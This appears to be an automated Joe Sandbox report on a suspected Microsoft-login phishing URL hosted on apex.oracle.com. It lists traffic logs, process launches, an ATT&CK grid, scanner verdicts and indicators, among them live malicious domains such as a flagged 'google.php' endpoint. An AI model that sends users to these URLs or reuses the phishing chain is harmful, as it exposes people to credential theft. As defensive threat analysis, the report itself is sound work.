      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.191.100:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.178:443 -> 192.168.2.16:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.178:443 -> 192.168.2.16:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 119.28.146.206:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.201.1:443 -> 192.168.2.16:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.231.24:443 -> 192.168.2.16:49766 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.231.24:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.12:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.15:443 -> 192.168.2.16:49780 version: TLS 1.2
      Source: classification engineClassification label: mal64.phis.win@25/34@48/275
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,914435731503330310,7250161230368154538,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,914435731503330310,7250161230368154538,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      2
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Extra Window Memory Injection
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/fonts/Font-APEX-Small.woff2?0%Avira URL Cloudsafe
      https://apex.oracle.com/pls/apex/r/capsicure/file-document/sw.js?v=24.2.2-15618029960919&lang=en0%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/css/Vita.min.css?v=24.2.20%Avira URL Cloudsafe
      https://apex.oracle.com/pls/apex/wwv_flow.js_dialogs?p_app_id=254038&p_version=24.2.2-156180299609190%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/libraries/apex/minified/desktop_all.min.js?v=24.2.20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/css/font-apex.min.css?v=24.2.20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/localeElements.js0%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/en/localeElements.js0%Avira URL Cloudsafe
      https://apex.oracle.com/pls/apex/r/capsicure/254038/files/static/v6/icons/app-icon-32.png0%Avira URL Cloudsafe
      https://apex.oracle.com/pls/apex/wwv_flow.js_messages?p_app_id=254038&p_lang=en&p_version=24.2.2-15618029960919&p_nls_settings=eyJudW1lcmljQ2hhcmFjdGVycyI6Ii4sIiwiY3VycmVuY3kiOiIkIiwiaXNvQ3VycmVuY3kiOiJBTUVSSUNBIiwiZHVhbEN1cnJlbmN5IjoiJCJ90%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/js/theme42.min.js?v=24.2.20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Theme-Standard.min.css?v=24.2.20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Core.min.css?v=24.2.20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/libraries/apex/minified/widget.stickyWidget.min.js?v=24.2.20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/app_ui/font/apex-5-icon-font.woff20%Avira URL Cloudsafe
      https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/css/Core.min.css?v=24.2.20%Avira URL Cloudsafe
      https://terinv.portrayed.it.com/ieyeb/0%Avira URL Cloudsafe
      https://terinv.portrayed.it.com/ieyeb0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/930c89eabd78adac/1744731599793/b6bAAss2ZvlWZK70%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=930c89eabd78adac&lang=auto0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1837457641:1744727525:J7mElHGIE9MX1KbzUdL-JeojqYJYfiEXGVNMaur5k_0/930c89eabd78adac/FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqg0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/930c89eabd78adac/1744731599796/1c1f611ef6273716802ea1a8d7f990018229fd501615d826c2bf7d6d37aadc62/ys1Mhcz1D9fG5Dv0%Avira URL Cloudsafe
      https://terinv.portrayed.it.com/favicon.ico0%Avira URL Cloudsafe
      https://5348785839.sbs/google.php100%Avira URL Cloudmalware
      https://5348785839-1317754460.cos.ap-seoul.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      mailmeteor.com
      172.67.187.19
      truefalse
        high
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          e329293.dscd.akamaiedge.net
          23.1.33.12
          truefalse
            high
            maxcdn.bootstrapcdn.com
            104.18.10.207
            truefalse
              high
              s-part-0013.t-0009.t-msedge.net
              13.107.246.41
              truefalse
                high
                cos.ap-seoul.myqcloud.com
                119.28.146.206
                truefalse
                  unknown
                  e11659.dscx.akamaiedge.net
                  96.17.44.16
                  truefalse
                    unknown
                    code.jquery.com
                    151.101.66.137
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        high
                        challenges.cloudflare.com
                        104.18.95.41
                        truefalse
                          high
                          resc.cloudinary.com.cdn.cloudflare.net
                          104.17.201.1
                          truefalse
                            high
                            www.google.com
                            142.250.191.100
                            truefalse
                              high
                              terinv.portrayed.it.com
                              104.21.32.178
                              truetrue
                                unknown
                                a637.dscq.akamai.net
                                104.76.210.90
                                truefalse
                                  unknown
                                  5348785839.sbs
                                  69.49.231.24
                                  truefalse
                                    unknown
                                    static.oracle.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      res.cloudinary.com
                                      unknown
                                      unknownfalse
                                        high
                                        apex.oracle.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          5348785839-1317754460.cos.ap-seoul.myqcloud.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            aadcdn.msftauth.net
                                            unknown
                                            unknownfalse
                                              high
                                              aadcdn.msauthimages.net
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089false
                                                  high
                                                  https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/fonts/Font-APEX-Small.woff2?false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://apex.oracle.com/pls/apex/wwv_flow.js_messages?p_app_id=254038&p_lang=en&p_version=24.2.2-15618029960919&p_nls_settings=eyJudW1lcmljQ2hhcmFjdGVycyI6Ii4sIiwiY3VycmVuY3kiOiIkIiwiaXNvQ3VycmVuY3kiOiJBTUVSSUNBIiwiZHVhbEN1cnJlbmN5IjoiJCJ9false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/css/font-apex.min.css?v=24.2.2false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://apex.oracle.com/pls/apex/r/capsicure/254038/files/static/v6/icons/app-icon-32.pngfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://apex.oracle.com/pls/apex/wwv_flow.js_dialogs?p_app_id=254038&p_version=24.2.2-15618029960919false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://apex.oracle.com/pls/apex/r/capsicure/file-document/sw.js?v=24.2.2-15618029960919&lang=enfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://5348785839.sbs/google.phptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://5348785839-1317754460.cos.ap-seoul.myqcloud.com/bootstrap.min.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                    high
                                                    https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663false
                                                      high
                                                      https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                        high
                                                        https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                          high
                                                          https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                            high
                                                            https://static.oracle.com/cdn/apex/24.2.2/app_ui/font/apex-5-icon-font.woff2false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Theme-Standard.min.css?v=24.2.2false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://static.oracle.com/cdn/apex/24.2.2/libraries/apex/minified/widget.stickyWidget.min.js?v=24.2.2false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/930c89eabd78adac/1744731599793/b6bAAss2ZvlWZK7false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/css/Core.min.css?v=24.2.2false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://terinv.portrayed.it.com/ieyebfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                              high
                                                              https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/css/Vita.min.css?v=24.2.2false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-documentfalse
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=930c89eabd78adac&lang=autofalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                  high
                                                                  https://static.oracle.com/cdn/apex/24.2.2/libraries/apex/minified/desktop_all.min.js?v=24.2.2false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1837457641:1744727525:J7mElHGIE9MX1KbzUdL-JeojqYJYfiEXGVNMaur5k_0/930c89eabd78adac/FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.oracle.com/cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/localeElements.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/930c89eabd78adac/1744731599796/1c1f611ef6273716802ea1a8d7f990018229fd501615d826c2bf7d6d37aadc62/ys1Mhcz1D9fG5Dvfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.oracle.com/cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/en/localeElements.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Core.min.css?v=24.2.2false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/js/theme42.min.js?v=24.2.2false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://terinv.portrayed.it.com/ieyeb/true
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                    high
                                                                    https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.pngfalse
                                                                      high
                                                                      https://terinv.portrayed.it.com/favicon.icofalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                                                        high
                                                                        https://challenges.cloudflare.com/turnstile/v0/b/580ba44007a6/api.jsfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          13.107.246.41
                                                                          s-part-0013.t-0009.t-msedge.netUnited States
                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          104.18.10.207
                                                                          stackpath.bootstrapcdn.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          96.17.44.16
                                                                          e11659.dscx.akamaiedge.netUnited States
                                                                          16625AKAMAI-ASUSfalse
                                                                          172.67.187.19
                                                                          mailmeteor.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.18.94.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          69.49.231.24
                                                                          5348785839.sbsUnited States
                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                          96.7.218.74
                                                                          unknownUnited States
                                                                          20940AKAMAI-ASN1EUfalse
                                                                          151.101.66.137
                                                                          code.jquery.comUnited States
                                                                          54113FASTLYUSfalse
                                                                          119.28.146.206
                                                                          cos.ap-seoul.myqcloud.comChina
                                                                          132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                          104.21.92.58
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          74.125.138.95
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          172.217.215.95
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          108.177.122.113
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          64.233.177.94
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          23.1.33.12
                                                                          e329293.dscd.akamaiedge.netUnited States
                                                                          20940AKAMAI-ASN1EUfalse
                                                                          1.1.1.1
                                                                          unknownAustralia
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.21.32.178
                                                                          terinv.portrayed.it.comUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          142.250.9.139
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.18.95.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          172.253.124.94
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          173.194.219.84
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          23.1.33.15
                                                                          unknownUnited States
                                                                          20940AKAMAI-ASN1EUfalse
                                                                          104.17.202.1
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.17.201.1
                                                                          resc.cloudinary.com.cdn.cloudflare.netUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          74.125.21.101
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          108.177.122.94
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.191.100
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.76.210.90
                                                                          a637.dscq.akamai.netUnited States
                                                                          6762SEABONE-NETTELECOMITALIASPARKLESpAITfalse
                                                                          104.17.25.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          IP
                                                                          192.168.2.16
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1665614
                                                                          Start date and time:2025-04-15 17:39:09 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                          Sample URL:https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:14
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          Analysis Mode:stream
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal64.phis.win@25/34@48/275
                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 74.125.21.101, 74.125.21.113, 74.125.21.138, 74.125.21.139, 74.125.21.102, 74.125.21.100, 172.253.124.94, 108.177.122.113, 108.177.122.100, 108.177.122.102, 108.177.122.138, 108.177.122.101, 108.177.122.139, 173.194.219.84, 74.125.138.139, 74.125.138.113, 74.125.138.100, 74.125.138.102, 74.125.138.101, 74.125.138.138, 142.250.9.139, 142.250.9.102, 142.250.9.100, 142.250.9.101, 142.250.9.138, 142.250.9.113
                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (358)
                                                                          Category:downloaded
                                                                          Size (bytes):1427
                                                                          Entropy (8bit):5.067653849581385
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F9B722E8C13B213BE7677F1C86EF1833
                                                                          SHA1:39E10A8396A5D150F8AE1CA60E15E427E767B364
                                                                          SHA-256:827679BCB010014E2D97C409D74D29239E91491C8D8FBAE15FBD45542054E03F
